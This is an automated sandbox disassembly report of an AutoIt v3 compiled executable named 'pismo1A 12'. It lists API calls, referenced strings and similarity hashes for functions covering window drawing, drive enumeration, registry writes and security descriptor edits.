CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00722900
GetClientRect.USER32(00000000,?), ref: 0072290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00722955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00722964
GetStockObject.GDI32(00000011), ref: 00722974
SelectObject.GDI32(00000000,00000000), ref: 00722978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00722988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00722991
DeleteDC.GDI32(00000000), ref: 0072299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007229C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 007229DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00722A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00722A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00722A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00722A77
GetStockObject.GDI32(00000011), ref: 00722A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00722A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00722A97

Strings

msctls_progress32, xrefs: 00722A13
AutoIt v3, xrefs: 007228F8
DISPLAY, xrefs: 0072295A
static, xrefs: 0072294F, 00722A71

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: da76caf5ee2c9cac1836dcd2884e4adabb05adb5a1fc766797fda0261d378f3c
Instruction ID: 28e0d2cd8ab9de0a78fc16ee08eb80f2a099983394612d1d088f0014fbc8479c
Opcode Fuzzy Hash: da76caf5ee2c9cac1836dcd2884e4adabb05adb5a1fc766797fda0261d378f3c
Instruction Fuzzy Hash: 1AB15EB1A00215BFEB14DF68DC86FAE7BA9EB05711F008118F915E7291D778ED40CBA4

Function 00714ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00714AED
GetDriveTypeW.KERNEL32(?,0073CB68,?,\\.\,0073CC08), ref: 00714BCA
SetErrorMode.KERNEL32(00000000,0073CB68,?,\\.\,0073CC08), ref: 00714D36

Strings

ATAPI, xrefs: 00714C91
SCSI, xrefs: 00714C8A
CDROM, xrefs: 00714BFB
ATA, xrefs: 00714C98
RAID, xrefs: 00714CBB
Unknown, xrefs: 00714BED, 00714C83
Virtual, xrefs: 00714CE5
MMC, xrefs: 00714CDE
Fixed, xrefs: 00714C09
\\.\, xrefs: 00714B3F
iSCSI, xrefs: 00714CC2
SATA, xrefs: 00714CD0
1394, xrefs: 00714C9F
RAMDisk, xrefs: 00714BF4
USB, xrefs: 00714CB4
SSA, xrefs: 00714CA6
Fibre, xrefs: 00714CAD
SAS, xrefs: 00714CC9
FileBackedVirtual, xrefs: 00714CEC
Network, xrefs: 00714C02
Removable, xrefs: 00714C10, 00714C15
SSD, xrefs: 00714C4A
PhysicalDrive, xrefs: 00714B76

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 87c39894f88bcde3b8b554fba7ab1a51162e43dc5877637e9890f4c1bfbc9333
Instruction ID: 8cf435041efa109be069e1ccf4fe5cf1c9d552c8c2fbcb8ead83f7d99604e223
Opcode Fuzzy Hash: 87c39894f88bcde3b8b554fba7ab1a51162e43dc5877637e9890f4c1bfbc9333
Instruction Fuzzy Hash: 8761AFB0705105DBCF14EF2CCA919E8B7B1AB45740B648019F807AB6D1DB2DED81DBA1

Function 007373E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00737421
SetTextColor.GDI32(?,?), ref: 00737425
GetSysColorBrush.USER32(0000000F), ref: 0073743B
GetSysColor.USER32(0000000F), ref: 00737446
CreateSolidBrush.GDI32(?), ref: 0073744B
GetSysColor.USER32(00000011), ref: 00737463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00737471
SelectObject.GDI32(?,00000000), ref: 00737482
SetBkColor.GDI32(?,00000000), ref: 0073748B
SelectObject.GDI32(?,?), ref: 00737498
InflateRect.USER32(?,000000FF,000000FF), ref: 007374B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007374CE
GetWindowLongW.USER32(00000000,000000F0), ref: 007374DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0073752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00737554
InflateRect.USER32(?,000000FD,000000FD), ref: 00737572
DrawFocusRect.USER32(?,?), ref: 0073757D
GetSysColor.USER32(00000011), ref: 0073758E
SetTextColor.GDI32(?,00000000), ref: 00737596
DrawTextW.USER32(?,007370F5,000000FF,?,00000000), ref: 007375A8
SelectObject.GDI32(?,?), ref: 007375BF
DeleteObject.GDI32(?), ref: 007375CA
SelectObject.GDI32(?,?), ref: 007375D0
DeleteObject.GDI32(?), ref: 007375D5
SetTextColor.GDI32(?,?), ref: 007375DB
SetBkColor.GDI32(?,?), ref: 007375E5

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 17f733620d31f3b65bd1d485d45ba62d70f9265cdfa2ea1a5bafd105acc9a974
Instruction ID: e0a3a3e54a0c2ab29dc5b81ade326b15148263bb21b598bd37053bc0d38ebf17
Opcode Fuzzy Hash: 17f733620d31f3b65bd1d485d45ba62d70f9265cdfa2ea1a5bafd105acc9a974
Instruction Fuzzy Hash: 586172B2900218AFEF159FA4DC49EEE7FB9EB08321F108115F911BB2A1D7799940DF94

Function 00730FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00731128
GetDesktopWindow.USER32 ref: 0073113D
GetWindowRect.USER32(00000000), ref: 00731144
GetWindowLongW.USER32(?,000000F0), ref: 00731199
DestroyWindow.USER32(?), ref: 007311B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007311ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0073120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0073121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00731232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00731245
IsWindowVisible.USER32(00000000), ref: 007312A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007312BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007312D0
GetWindowRect.USER32(00000000,?), ref: 007312E8
MonitorFromPoint.USER32(?,?,00000002), ref: 0073130E
GetMonitorInfoW.USER32(00000000,?), ref: 00731328
CopyRect.USER32(?,?), ref: 0073133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 007313AA

Strings

(, xrefs: 0073131B
0, xrefs: 007310D3
tooltips_class32, xrefs: 007311E6

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: cdaf07d7d2133eac99746c1d720d9e668e1b7087c8a7d52780a1c842e3d03f0b
Instruction ID: db5fe0ec62464260e6b64d7936c1892697c12666e8a794524e72ea6a28041721
Opcode Fuzzy Hash: cdaf07d7d2133eac99746c1d720d9e668e1b7087c8a7d52780a1c842e3d03f0b
Instruction Fuzzy Hash: 5CB17A71604341AFE704DF64C885B6ABBE5FF85350F40891CF999AB262C735E844CFA6

Function 00730241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007302E5
_wcslen.LIBCMT ref: 0073031F
_wcslen.LIBCMT ref: 00730389
_wcslen.LIBCMT ref: 007303F1
_wcslen.LIBCMT ref: 00730475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007304C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00730504

Part of subcall function 006BF9F2: _wcslen.LIBCMT ref: 006BF9FD

Part of subcall function 0070223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00702258
Part of subcall function 0070223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0070228A

Strings

SELECTINVERT, xrefs: 0073057E
VIEWCHANGE, xrefs: 00730675
GETITEMCOUNT, xrefs: 00730316, 00730337
GETSUBITEMCOUNT, xrefs: 00730384, 0073039F
FINDITEM, xrefs: 00730627
SELECT, xrefs: 00730548
GETSELECTEDCOUNT, xrefs: 00730470, 0073048B
ISSELECTED, xrefs: 007304DD
GETTEXT, xrefs: 007303EC, 00730407
GETSELECTED, xrefs: 007305E1
DESELECT, xrefs: 0073059C
SELECTCLEAR, xrefs: 0073052D
SELECTALL, xrefs: 00730515

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: d6c5eeec2947e776baa6486275d4f09290e4cbc21dd0afb4fd8f69ed43c24065
Instruction ID: 65b978db7ae4529284bac04a981cc52ab33dd8fbb27af9b44e61dbb7d8a426fc
Opcode Fuzzy Hash: d6c5eeec2947e776baa6486275d4f09290e4cbc21dd0afb4fd8f69ed43c24065
Instruction Fuzzy Hash: 36E1CF31208201CFD754EF24C86192AB3E6BF89758F14496CF8969B3A7DB38ED45CB91

Function 006B8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006B8968
GetSystemMetrics.USER32(00000007), ref: 006B8970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006B899B
GetSystemMetrics.USER32(00000008), ref: 006B89A3
GetSystemMetrics.USER32(00000004), ref: 006B89C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006B89E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006B89F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006B8A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006B8A3C
GetClientRect.USER32(00000000,000000FF), ref: 006B8A5A
GetStockObject.GDI32(00000011), ref: 006B8A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 006B8A81

Part of subcall function 006B912D: GetCursorPos.USER32(?), ref: 006B9141
Part of subcall function 006B912D: ScreenToClient.USER32(00000000,?), ref: 006B915E
Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000001), ref: 006B9183
Part of subcall function 006B912D: GetAsyncKeyState.USER32(00000002), ref: 006B919D

SetTimer.USER32(00000000,00000000,00000028,006B90FC), ref: 006B8AA8

Strings

AutoIt v3 GUI, xrefs: 006B8A20

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 14dc54f7cf47bfa177b229708c8a78a97ef4f65edcdd2d0aae94e32e928214f3
Instruction ID: 3bfc0631aef495041408a5687020f382822893cf2e167002b8ac7ff0155f728d
Opcode Fuzzy Hash: 14dc54f7cf47bfa177b229708c8a78a97ef4f65edcdd2d0aae94e32e928214f3
Instruction Fuzzy Hash: E6B15C75A00209EFDF14DF68CC45BEA3BB6FB48355F108129FA15AB290DB74A881CF55

Function 00700D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00701114
Part of subcall function 007010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701120
Part of subcall function 007010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 0070112F
Part of subcall function 007010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701136
Part of subcall function 007010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0070114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00700DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00700E29
GetLengthSid.ADVAPI32(?), ref: 00700E40
GetAce.ADVAPI32(?,00000000,?), ref: 00700E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00700E96
GetLengthSid.ADVAPI32(?), ref: 00700EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00700EB5
HeapAlloc.KERNEL32(00000000), ref: 00700EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00700EDD
CopySid.ADVAPI32(00000000), ref: 00700EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00700F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00700F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00700F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700F6E
HeapFree.KERNEL32(00000000), ref: 00700F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700F7E
HeapFree.KERNEL32(00000000), ref: 00700F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00700F8E
HeapFree.KERNEL32(00000000), ref: 00700F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00700FA1
HeapFree.KERNEL32(00000000), ref: 00700FA8

Part of subcall function 00701193: GetProcessHeap.KERNEL32(00000008,00700BB1,?,00000000,?,00700BB1,?), ref: 007011A1
Part of subcall function 00701193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00700BB1,?), ref: 007011A8
Part of subcall function 00701193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00700BB1,?), ref: 007011B7

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: d783a7eb0859b0ccc15d8e383a06002010885fafa1cbaf80fc8dd4b1cd74b495
Instruction ID: a22aa24014bdb48f1c1d8d43cb68c6a4d5f30185135c0d1f548a2bc39a9882bc
Opcode Fuzzy Hash: d783a7eb0859b0ccc15d8e383a06002010885fafa1cbaf80fc8dd4b1cd74b495
Instruction Fuzzy Hash: 3271617190020AEBDF119FA4DC45FAEBBB8BF05311F048215F959B6191D739AA05DBA0

Function 0072C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,0073CC08,00000000,?,00000000,?,?), ref: 0072C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0072C5A4
_wcslen.LIBCMT ref: 0072C5F4
_wcslen.LIBCMT ref: 0072C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0072C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0072C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0072C84D
RegCloseKey.ADVAPI32(?), ref: 0072C881
RegCloseKey.ADVAPI32(00000000), ref: 0072C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0072C960

Strings

REG_BINARY, xrefs: 0072C913
REG_DWORD, xrefs: 0072C804
REG_MULTI_SZ, xrefs: 0072C6F5
REG_QWORD, xrefs: 0072C8C3
REG_SZ, xrefs: 0072C644
REG_EXPAND_SZ, xrefs: 0072C5CD

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 1cccc8b9af85fb94cb4ce05f57a6c6bea2c6664049a05341484b2116288215de
Instruction ID: 258f771ad8d706b2ce84f1b58b3c0fdf581cf18eca3a59df621730e3052cdf9b
Opcode Fuzzy Hash: 1cccc8b9af85fb94cb4ce05f57a6c6bea2c6664049a05341484b2116288215de
Instruction Fuzzy Hash: DA1289356042109FDB15EF14D881A2AB7E6EF89314F14889CF88A9B3A2DB35FD41CF95

Function 0073091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007309C6
_wcslen.LIBCMT ref: 00730A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00730A54
_wcslen.LIBCMT ref: 00730A8A
_wcslen.LIBCMT ref: 00730B06
_wcslen.LIBCMT ref: 00730B81

Part of subcall function 006BF9F2: _wcslen.LIBCMT ref: 006BF9FD

Part of subcall function 00702BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00702BFA

Strings

ISCHECKED, xrefs: 00730CE1
GETSELECTED, xrefs: 00730C4E
GETTEXT, xrefs: 00730C97
GETITEMCOUNT, xrefs: 00730C1E
EXPAND, xrefs: 00730BF8
GETTOTALCOUNT, xrefs: 007309F2, 00730A17
UNCHECK, xrefs: 00730D3E
CHECK, xrefs: 00730A85, 00730AA0
SELECT, xrefs: 00730D11
EXISTS, xrefs: 00730B7C, 00730B97
COLLAPSE, xrefs: 00730B01, 00730B1C

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 5bd4b8e52e3998bbd730ca1d7fdeb0d768c9140e4a4ed11150700ad2592087b0
Instruction ID: d41dd7b2a39cf0568ccdcd69e31dfc2e2415bc1e9896c3fed3645afc0c522572
Opcode Fuzzy Hash: 5bd4b8e52e3998bbd730ca1d7fdeb0d768c9140e4a4ed11150700ad2592087b0
Instruction Fuzzy Hash: 45E1BD712083018FC754EF24C86092AB7E2BF98358F14895CF8969B3A2DB39ED45CB91

Function 0072C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
_wcslen.LIBCMT ref: 0072C9F1
_wcslen.LIBCMT ref: 0072CA68
_wcslen.LIBCMT ref: 0072CA9E
_wcslen.LIBCMT ref: 0072CAF9
_wcslen.LIBCMT ref: 0072CB2F
_wcslen.LIBCMT ref: 0072CB7F

Strings

HKEY_LOCAL_MACHINE, xrefs: 0072CA62, 0072CA67
HKCC, xrefs: 0072CBAC
HKEY_CLASSES_ROOT, xrefs: 0072CAF3, 0072CAF8
HKU, xrefs: 0072CBF0
HKCU, xrefs: 0072CBCE
HKEY_CURRENT_CONFIG, xrefs: 0072CB79, 0072CB7E
HKEY_USERS, xrefs: 0072CBDF
HKLM, xrefs: 0072CA98, 0072CA9D
HKEY_CURRENT_USER, xrefs: 0072CBBD
HKCR, xrefs: 0072CB29, 0072CB2E

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.2033562765.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034049884.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035195871.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2038400053.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_pismo1A 12.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 1b7cdd72b66a3341e5a435153f19136cf216808664806388d3bf6fb5da8311cf
Instruction ID: 4d9bd2c757bedadbcdc4e9a1f3649ed3a55f0a7438e07a06221601d3035818a9
Opcode Fuzzy Hash: 1b7cdd72b66a3341e5a435153f19136cf216808664806388d3bf6fb5da8311cf
Instruction Fuzzy Hash: 0A71097260017A8BCB12DE7CED515BF33A19F71794B154528FC5697284E63DCD84C7A0

Function 0073833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0073835A
_wcslen.LIBCMT ref: 0073836E
_wcslen.LIBCMT ref: 00738391
_wcslen.LIBCMT ref: 007383B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007383F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00735BF2), ref: 0073844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00738487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007384CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00738501
FreeLibrary.KERNEL32(?), ref: 0073850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0073851D
DestroyIcon.USER32(?,?,?,?,?,00735BF2), ref: 0073852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00738549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00738555

Strings

.dll, xrefs: 007383AB
.icl, xrefs: 00738368
.exe, xrefs: 00738388

Memory Dump Source

Source File: 00000000.00000002.2033680614.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

